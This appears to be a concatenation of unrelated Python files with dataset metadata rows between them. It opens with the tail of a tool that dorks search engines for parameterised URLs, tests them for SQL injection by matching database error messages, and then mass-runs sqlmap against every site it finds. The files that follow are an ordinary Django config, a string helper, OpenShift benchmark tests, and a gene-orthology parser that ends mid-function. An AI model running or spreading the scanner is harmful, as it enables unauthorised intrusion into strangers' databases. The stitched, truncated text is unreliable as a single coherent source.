print(" [V] Check10 Oracle found: " + str(checkOR3))
print(" [V] Check11 Postgre found: " + str(checkPO1))
print(" [V] Check12 Postgre found: " + str(checkPO2))
if verboseactive == "2":
checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
checkverMS2 = soup.find(text=re.compile('An unhanded exception occurred during the execution'))
checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverPO1 = soup.find(text=re.compile('Query failed:'))
checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
print(
bcolors.OKGREEN
+ "\n"
+ " Possible vuln url!"
+ "\n"
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] "
+ line + bcolors.ENDC
+ "\n"
)
if savesearch == "y":
with open(filename, 'a') as file:
file.write(line)
else:
print(
bcolors.WARNING
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [-] " + line + bcolors.ENDC
)
except KeyboardInterrupt:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
print("\n Done scanning urls")
if savesearch == "y":
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
if resultsnumber == 0:
print(" No vuln urls, exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
if checkurls == "y":
try:
os.remove("tmpurllist")
except OSError:
pass
scanUrlsSQLmap(filename)
else:
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Scan urls with #")
print(" # SQLmap #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
if shutil.which('sqlmap') is None:
print(" SQLmap is not installed on system - can't go on.")
print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
print(" \nCommand:")
print(" sqlmap -m \"" + filenameVulnUrl + "\n")
else:
if filenameVulnUrl == "0":
print(" No filename in memory, please specify.")
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(filenameVulnUrl):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
print("Command to execute: " + command)
input(bcolors.ENDC + " Press enter to continue\n")
print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
# RUN SQLMAP !!
os.system(command)
# Not implemented - specify saving destination
# @type savingplace: str
# @param savingplace: Who should perform the search.
# savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
# if savingplace not in ('b', 'g'):
# print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
# savingplace = 'b'
def helpme():
print("\n\n" + bcolors.HEADER)
print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
print("\n\n" + bcolors.ENDC)
print(" This python script is developed to show, how many vulnerables websites,")
print(" which are laying around on the web. The main focus of the script is to")
print(" generate a list of vuln urls. Please use the script with causing and")
print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
print(" just for showcasing.")
print("")
print(" The script is divided into 3 main sections.\n")
print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
print(" In this section you have to provide a search string, which 'connects' to")
print(" the websites database, e.g. 'php?id='. The script then crawls")
print(" Bing or Google for urls containing it. All of the urls can then be saved")
print(" into a file. (Please be aware that you might get banned for crawling to")
print(" fast, remember an appropriate break/sleep between request).")
print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
print("")
print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
print(" This section adds a qoute ' to the websites url. If the website is")
print(" prone to SQL injection, we'll catch this with some predefined error")
print(" messages. The script will not add websites for blind SQL injections,")
print(" due to the predefined error messages.")
print("")
print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
print(" This is just an activation of sqlmap with the bulk argument and no")
print(" user interaction for validation of SQL injection.")
print("")
print("\n")
print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
print("\n")
sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
except:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
if re.match(r'tun.', 'tun') or re.match(r'ppp.', 'ppp') not in psutil.net_if_addrs():
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| true
| true
|
790c945b942734c8447cae4a5be22ceb46f4e28d
| 95
|
py
|
Python
|
SimpleNews/apps.py
|
cww97/newsChain
|
1243c47176ddfa680a69da0d325056698b11ad59
|
[
"WTFPL"
] | null | null | null |
SimpleNews/apps.py
|
cww97/newsChain
|
1243c47176ddfa680a69da0d325056698b11ad59
|
[
"WTFPL"
] | 2
|
2020-04-30T14:43:42.000Z
|
2020-07-19T14:37:34.000Z
|
SimpleNews/apps.py
|
cww97/newsChain
|
1243c47176ddfa680a69da0d325056698b11ad59
|
[
"WTFPL"
] | null | null | null |
from django.apps import AppConfig
class SimplenewsConfig(AppConfig):
name = 'SimpleNews'
| 15.833333
| 34
| 0.768421
|
from django.apps import AppConfig
class SimplenewsConfig(AppConfig):
name = 'SimpleNews'
| true
| true
|
790c951b07f4f5575656be117cc473bed050b786
| 501
|
py
|
Python
|
utils.py
|
domorelivelonger/rss-telegram-bot
|
c1bc3b2c9219eaeb4daa186874675128ee5386af
|
[
"MIT"
] | 1
|
2021-08-31T16:52:46.000Z
|
2021-08-31T16:52:46.000Z
|
utils.py
|
domorelivelonger/rss-telegram-bot
|
c1bc3b2c9219eaeb4daa186874675128ee5386af
|
[
"MIT"
] | null | null | null |
utils.py
|
domorelivelonger/rss-telegram-bot
|
c1bc3b2c9219eaeb4daa186874675128ee5386af
|
[
"MIT"
] | null | null | null |
# Get substring using 'start' and 'end' position.
def get_substring_or_empty(data, start, end=''):
if start in data:
if '' == start:
f = 0
else:
f = len(start)
f = data.find(start) + f
data = data[f:]
else:
return ''
if end in data:
if '' == end:
f = len(data)
else:
f = data.find(end)
data = data[:f]
else:
return ''
data = data.strip()
return data
| 20.04
| 49
| 0.447106
|
def get_substring_or_empty(data, start, end=''):
if start in data:
if '' == start:
f = 0
else:
f = len(start)
f = data.find(start) + f
data = data[f:]
else:
return ''
if end in data:
if '' == end:
f = len(data)
else:
f = data.find(end)
data = data[:f]
else:
return ''
data = data.strip()
return data
| true
| true
|
790c95727d163da9103c29441e784b656b234fcd
| 4,274
|
py
|
Python
|
tests/integration/benchmark_runner/common/oc/test_oc_without_operator.py
|
RobertKrawitz/benchmark-runner
|
671fd638ba139d74a3356673ad27b78b35a6a66a
|
[
"Apache-2.0"
] | 10
|
2021-07-21T21:44:20.000Z
|
2022-02-24T22:01:13.000Z
|
tests/integration/benchmark_runner/common/oc/test_oc_without_operator.py
|
RobertKrawitz/benchmark-runner
|
671fd638ba139d74a3356673ad27b78b35a6a66a
|
[
"Apache-2.0"
] | 83
|
2021-07-20T14:37:44.000Z
|
2022-03-24T13:48:04.000Z
|
tests/integration/benchmark_runner/common/oc/test_oc_without_operator.py
|
RobertKrawitz/benchmark-runner
|
671fd638ba139d74a3356673ad27b78b35a6a66a
|
[
"Apache-2.0"
] | 6
|
2021-07-14T21:12:48.000Z
|
2022-02-15T12:48:27.000Z
|
# Tests that are not required benchmark-operator pod
from benchmark_runner.common.oc.oc import OC
from tests.integration.benchmark_runner.test_environment_variables import *
import tempfile
import tarfile
import time
from benchmark_runner.common.prometheus.prometheus_snapshot import PrometheusSnapshot
def test_oc_get_ocp_server_version():
"""
This method get ocp server version
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_ocp_server_version()
def test_oc_get_kata_version():
"""
This method gets the sandboxed containers (kata) version
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_kata_version()
def test_oc_get_cnv_version():
"""
This method get cnv version
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_cnv_version()
def test_oc_get_ocs_version():
"""
This method get ocs version
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_ocs_version()
def test_oc_get_master_nodes():
"""
This method test get master nodes
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_master_nodes()
def test_login():
"""
This method test login
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc.login()
def test_oc_get_pod_name():
"""
This test run oc get pod by name
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc._get_pod_name(pod_name='erererer', namespace=test_environment_variable['namespace']) == ''
def test_oc_get_pods():
"""
This test run oc get pods
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc.get_pods()
def test_get_prom_token():
"""
This method return prom token from cluster
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_prom_token()
def test_is_cnv_installed():
"""
This method check if cnv operator is installed
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_cnv_installed()
def test_is_kata_installed():
"""
This method checks if the sandboxed containers (kata) operator is installed
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_kata_installed()
def test_is_ocs_installed():
"""
This method check if ocs operator is installed
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_ocs_installed()
def test_is_kata_installed():
"""
This method check if kata operator is installed
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_kata_installed()
def test_oc_exec():
"""
Test that oc exec works
:return:
"""
test_message = "I am here"
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
answer = oc.exec(pod_name="prometheus-k8s-0", namespace="openshift-monitoring", container='prometheus', command=f'echo "{test_message}"')
assert answer == test_message
def test_collect_prometheus():
"""
Test that Prometheus data can be collected. TBD test that data is valid.
:return:
"""
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with tempfile.TemporaryDirectory() as dirname:
snapshot = PrometheusSnapshot(oc=oc, artifacts_path=dirname, verbose=True)
snapshot.prepare_for_snapshot(pre_wait_time=1)
time.sleep(10)
tarball = snapshot.retrieve_snapshot(post_wait_time=1)
assert tarfile.is_tarfile(tarball)
| 26.060976
| 141
| 0.704024
|
from benchmark_runner.common.oc.oc import OC
from tests.integration.benchmark_runner.test_environment_variables import *
import tempfile
import tarfile
import time
from benchmark_runner.common.prometheus.prometheus_snapshot import PrometheusSnapshot
def test_oc_get_ocp_server_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_ocp_server_version()
def test_oc_get_kata_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_kata_version()
def test_oc_get_cnv_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_cnv_version()
def test_oc_get_ocs_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_ocs_version()
def test_oc_get_master_nodes():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_master_nodes()
def test_login():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc.login()
def test_oc_get_pod_name():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc._get_pod_name(pod_name='erererer', namespace=test_environment_variable['namespace']) == ''
def test_oc_get_pods():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc.get_pods()
def test_get_prom_token():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_prom_token()
def test_is_cnv_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_cnv_installed()
def test_is_kata_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_kata_installed()
def test_is_ocs_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_ocs_installed()
def test_is_kata_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_kata_installed()
def test_oc_exec():
test_message = "I am here"
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
answer = oc.exec(pod_name="prometheus-k8s-0", namespace="openshift-monitoring", container='prometheus', command=f'echo "{test_message}"')
assert answer == test_message
def test_collect_prometheus():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with tempfile.TemporaryDirectory() as dirname:
snapshot = PrometheusSnapshot(oc=oc, artifacts_path=dirname, verbose=True)
snapshot.prepare_for_snapshot(pre_wait_time=1)
time.sleep(10)
tarball = snapshot.retrieve_snapshot(post_wait_time=1)
assert tarfile.is_tarfile(tarball)
| true
| true
|
790c95ac63865502589c094f74b76d70fd67aee3
| 15,667
|
py
|
Python
|
dipper/sources/Panther.py
|
putmantime/dipper
|
583d76207877096a84a98a379c904ea9c960c400
|
[
"BSD-3-Clause"
] | null | null | null |
dipper/sources/Panther.py
|
putmantime/dipper
|
583d76207877096a84a98a379c904ea9c960c400
|
[
"BSD-3-Clause"
] | null | null | null |
dipper/sources/Panther.py
|
putmantime/dipper
|
583d76207877096a84a98a379c904ea9c960c400
|
[
"BSD-3-Clause"
] | 1
|
2022-01-04T14:34:33.000Z
|
2022-01-04T14:34:33.000Z
|
import tarfile
import re
import logging
from dipper.sources.Source import Source
from dipper.models.assoc.OrthologyAssoc import OrthologyAssoc
from dipper.models.Model import Model
from dipper.models.Dataset import Dataset
from dipper import config
from dipper import curie_map
__author__ = 'nicole'
logger = logging.getLogger(__name__)
class Panther(Source):
"""
The pairwise orthology calls from Panther DB:
http://pantherdb.org/ encompass 22 species,
from the RefGenome and HCOP projects.
Here, we map the orthology classes to RO homology relationships
This resource may be extended in the future with additional species.
This currently makes a graph of orthologous relationships between genes,
with the assumption that gene metadata (labels, equivalent ids) are
provided from other sources.
Gene families are nominally created from the orthology files,
though these are incomplete with no hierarchical (subfamily) information.
This will get updated from the HMM files in the future.
Note that there is a fair amount of identifier cleanup performed to align
with our standard CURIE prefixes.
The test graph of data is output based on configured
"protein" identifiers in conf.json.
By default, this will produce a file with ALL orthologous relationships.
IF YOU WANT ONLY A SUBSET, YOU NEED TO PROVIDE A FILTER UPON CALLING THIS
WITH THE TAXON IDS
"""
PNTHDL = 'ftp://ftp.pantherdb.org/ortholog/current_release'
files = {
'refgenome': {
'file': 'RefGenomeOrthologs.tar.gz',
'url': PNTHDL+'/RefGenomeOrthologs.tar.gz'},
'hcop': {
'file': 'Orthologs_HCOP.tar.gz',
'url': PNTHDL+'/Orthologs_HCOP.tar.gz'}
}
def __init__(self, graph_type, are_bnodes_skolemized, tax_ids=None):
super().__init__(graph_type, are_bnodes_skolemized, 'panther')
self.tax_ids = tax_ids
self.dataset = Dataset(
'panther', 'Protein ANalysis THrough Evolutionary Relationships',
'http://pantherdb.org/', None,
'http://www.pantherdb.org/terms/disclaimer.jsp')
# # Defaults
# if self.tax_ids is None:
# self.tax_ids = [9606, 10090, 7955]
if 'test_ids' not in config.get_config() \
or 'protein' not in config.get_config()['test_ids']:
logger.warning("not configured with gene test ids.")
else:
self.test_ids = config.get_config()['test_ids']['protein']
return
def fetch(self, is_dl_forced=False):
"""
:return: None
"""
self.get_files(is_dl_forced)
# TODO the version number is tricky to get
# we can't get it from redirects of the url
# TODO use the remote timestamp of the file?
return
def parse(self, limit=None):
"""
:return: None
"""
if self.testOnly:
self.testMode = True
if self.tax_ids is None:
logger.info(
"No taxon filter set; Dumping all orthologous associations.")
else:
logger.info(
"Only the following taxa will be dumped: %s",
str(self.tax_ids))
self._get_orthologs(limit)
return
def _get_orthologs(self, limit):
"""
This will process each of the specified pairwise orthology files,
creating orthology associations based on the specified orthology code.
this currently assumes that each of the orthology files is identically
formatted. Relationships are made between genes here.
There is also a nominal amount of identifier re-formatting:
MGI:MGI --> MGI
Ensembl --> ENSEMBL
we skip any genes where we don't know how to map the gene identifiers.
For example, Gene:Huwe1 for RAT is not an identifier, so we skip any
mappings to this identifier. Often, the there are two entries for the
same gene (base on equivalent Uniprot id), and so we are not actually
losing any information.
We presently have a hard-coded filter to select only orthology
relationships where one of the pair is in our species of interest
(Mouse and Human, for the moment).
This will be added as a configurable parameter in the future.
Genes are also added to a grouping class defined with a PANTHER id.
Triples:
<gene1_id> RO:othologous <gene2_id>
<assoc_id> :hasSubject <gene1_id>
<assoc_id> :hasObject <gene2_id>
<assoc_id> :hasPredicate <RO:orthologous>
<assoc_id> dc:evidence ECO:phylogenetic_evidence
<panther_id> a DATA:gene_family
<panther_id> RO:has_member <gene1_id>
<panther_id> RO:has_member <gene2_id>
:param limit:
:return:
"""
logger.info("getting orthologs")
if self.testMode:
g = self.testgraph
else:
g = self.graph
model = Model(g)
unprocessed_gene_ids = set()
for k in self.files.keys():
f = '/'.join((self.rawdir, self.files[k]['file']))
matchcounter = 0
mytar = tarfile.open(f, 'r:gz')
# assume that the first entry is the item
fname = mytar.getmembers()[0]
logger.info("Parsing %s", fname.name)
line_counter = 0
with mytar.extractfile(fname) as csvfile:
for line in csvfile:
# skip comment lines
if re.match(r'^#', line.decode()):
logger.info("Skipping header line")
continue
line_counter += 1
# a little feedback to the user since there's so many
if line_counter % 1000000 == 0:
logger.info(
"Processed %d lines from %s",
line_counter, fname.name)
line = line.decode().strip()
# parse each row. ancestor_taxon is unused
# HUMAN|Ensembl=ENSG00000184730|UniProtKB=Q0VD83
# MOUSE|MGI=MGI=2176230|UniProtKB=Q8VBT6
# LDO Euarchontoglires PTHR15964
(a, b, orthology_class, ancestor_taxon,
panther_id) = line.split('\t')
(species_a, gene_a, protein_a) = a.split('|')
(species_b, gene_b, protein_b) = b.split('|')
# skip the entries that don't have homolog relationships
# with the test ids
if self.testMode and not (
re.sub(r'UniProtKB=', '',
protein_a) in self.test_ids or
re.sub(r'UniProtKB=', '', protein_b)
in self.test_ids):
continue
# map the taxon abbreviations to ncbi taxon ids
taxon_a = self._map_taxon_abbr_to_id(species_a)
taxon_b = self._map_taxon_abbr_to_id(species_b)
# ###uncomment the following code block
# if you want to filter based on taxid of favorite animals
# taxids = [9606,10090,10116,7227,7955,6239,8355]
# taxids = [9606] #human only
# retain only those orthologous relationships to genes
# in the specified taxids
# using AND will get you only those associations where
# gene1 AND gene2 are in the taxid list (most-filter)
# using OR will get you any associations where
# gene1 OR gene2 are in the taxid list (some-filter)
if (
self.tax_ids is not None and
(int(re.sub(r'NCBITaxon:', '', taxon_a.rstrip()))
not in self.tax_ids) and
(int(re.sub(
r'NCBITaxon:', '', taxon_b.rstrip())) not in
self.tax_ids)):
continue
else:
matchcounter += 1
if limit is not None and matchcounter > limit:
break
# ### end code block for filtering on taxon
# fix the gene identifiers
gene_a = re.sub(r'=', ':', gene_a)
gene_b = re.sub(r'=', ':', gene_b)
clean_gene = self._clean_up_gene_id(gene_a, species_a)
if clean_gene is None:
unprocessed_gene_ids.add(gene_a)
gene_a = clean_gene
clean_gene = self._clean_up_gene_id(gene_b, species_b)
if clean_gene is None:
unprocessed_gene_ids.add(gene_b)
gene_b = clean_gene
# a special case here; mostly some rat genes
# they use symbols instead of identifiers. will skip
if gene_a is None or gene_b is None:
continue
rel = self._map_orthology_code_to_RO(orthology_class)
evidence_id = 'ECO:0000080' # phylogenetic evidence
# add the association and relevant nodes to graph
assoc = OrthologyAssoc(g, self.name, gene_a, gene_b, rel)
assoc.add_evidence(evidence_id)
# add genes to graph;
# assume labels will be taken care of elsewhere
model.addClassToGraph(gene_a, None)
model.addClassToGraph(gene_b, None)
# might as well add the taxon info for completeness
g.addTriple(
gene_a, model.object_properties['in_taxon'], taxon_a)
g.addTriple(
gene_b, model.object_properties['in_taxon'], taxon_b)
assoc.add_association_to_graph()
# note this is incomplete...
# it won't construct the full family hierarchy,
# just the top-grouping
assoc.add_gene_family_to_graph(
':'.join(('PANTHER', panther_id)))
if not self.testMode \
and limit is not None and line_counter > limit:
break
logger.info("finished processing %s", f)
logger.warning(
"The following gene ids were unable to be processed: %s",
str(unprocessed_gene_ids))
return
@staticmethod
def _map_taxon_abbr_to_id(ptax):
"""
Will map the panther-specific taxon abbreviations to NCBI taxon numbers
:param ptax:
:return: NCBITaxon id
"""
taxid = None
ptax_to_taxid_map = {
'ANOCA': 28377, # green lizard
'ARATH': 3702, # arabadopsis
'BOVIN': 9913, # cow
'CAEEL': 6239, # worm
'CANFA': 9615, # dog
'CHICK': 9031, # chicken
'DANRE': 7955, # zebrafish
'DICDI': 44689, # discodium
'DROME': 7227, # drosophila melanogaster
'ECOLI': 562,
'HORSE': 9796, # horses
'HUMAN': 9606, # humans
'MACMU': 9544, # macaque
'MONDO': 13616, # opossum
'MOUSE': 10090, # mouse
'ORNAN': 9258, # orangutan
'PANTR': 9598, # chimp
'PIG': 9823,
'RAT': 10116,
'SCHPO': 4896, # pombe yeast
'TAKRU': 31033, # pufferfish
'XENTR': 8364, # xenopus
'YEAST': 4932, # yeast
}
if ptax in ptax_to_taxid_map:
taxid = ':'.join(('NCBITaxon', str(ptax_to_taxid_map.get(ptax))))
else:
logger.error("unmapped taxon code %s", ptax)
return taxid
@staticmethod
def _map_orthology_code_to_RO(ortho):
"""
Map the panther-specific orthology code (P,O,LDO,X,LDX)
to relationship-ontology
identifiers.
:param ortho: orthology code
:return: RO identifier
"""
ortho_rel = OrthologyAssoc.ortho_rel
ro_id = ortho_rel['orthologous'] # in orthology relationship with
ortho_to_ro_map = {
'P': ortho_rel['paralogous'],
'O': ortho_rel['orthologous'],
'LDO': ortho_rel['least_diverged_orthologous'],
'X': ortho_rel['xenologous'],
'LDX': ortho_rel['xenologous']
}
if ortho in ortho_to_ro_map:
ro_id = ortho_to_ro_map.get(ortho)
else:
logger.warning(
"unmapped orthology code %s. Defaulting to 'orthology'", ortho)
return ro_id
@staticmethod
def _clean_up_gene_id(geneid, sp):
"""
A series of identifier rewriting to conform with
standard gene identifiers.
:param geneid:
:param sp:
:return:
"""
# special case for MGI
geneid = re.sub(r'MGI:MGI:', 'MGI:', geneid)
# rewrite Ensembl --> ENSEMBL
geneid = re.sub(r'Ensembl', 'ENSEMBL', geneid)
# rewrite Gene:CELE --> WormBase
# these are old-school cosmid identifier
geneid = re.sub(r'Gene:CELE', 'WormBase:', geneid)
if sp == 'CAEEL':
if re.match(r'(Gene|ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:Gene|ENSEMBLGenome):(\w+\.\d+)',
r'WormBase:\1', geneid)
if sp == 'DROME':
if re.match(r'(ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:ENSEMBLGenome):(\w+\.\d+)', r'FlyBase:\1', geneid)
# rewrite GeneID --> NCBIGene
geneid = re.sub(r'GeneID', 'NCBIGene', geneid)
# rewrite Gene:Dmel --> FlyBase
geneid = re.sub(r'Gene:Dmel_', 'FlyBase:', geneid)
# rewrite Gene:CG --> FlyBase:CG
geneid = re.sub(r'Gene:CG', 'FlyBase:CG', geneid)
